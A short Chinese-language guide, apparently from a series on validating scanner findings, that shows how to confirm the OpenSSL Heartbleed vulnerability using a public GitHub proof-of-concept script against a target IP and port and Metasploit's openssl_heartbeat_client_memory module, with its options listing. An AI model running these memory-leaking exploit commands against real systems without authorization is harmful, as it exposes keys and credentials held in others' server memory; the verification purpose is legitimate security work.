本系列文章旨在对于有一定网络安全基础的人员,在日常工作中扫描出来的各种漏洞,如何进行验证,以区分该漏洞是否存在或是扫描器误报。请勿应用非法途径。
1.安装opssl心脏滴血测试工具
git clone https://github.com/akhld/heartbleed.git /usr/local/tools/heartbleed
python heartbleed.py 目标ip -p 目标端口
该漏洞能读取到内存中的数据,若在结果中能读取到内存中的内容,即为漏洞存在。
2.使用msf的auxiliary/server/openssl_heartbeat_client_memory模块
msf > use auxiliary/server/openssl_heartbeat_client_memory
msf auxiliary(server/openssl_heartbeat_client_memory) > show options
Module options (auxiliary/server/openssl_heartbeat_client_memory):
Name Current Setting Required Description
---- --------------- -------- -----------
HEARTBEAT_LIMIT 512 yes The number of kilobytes of data to capture at most from each client
HEARTBEAT_READ 65535 yes The number of bytes to leak in the heartbeat response
NEGOTIATE_TLS false yes Set this to true to negotiate TLS and often leak more data at the cost of CA validation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8443 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Auxiliary action:
Name Description
---- -----------
Capture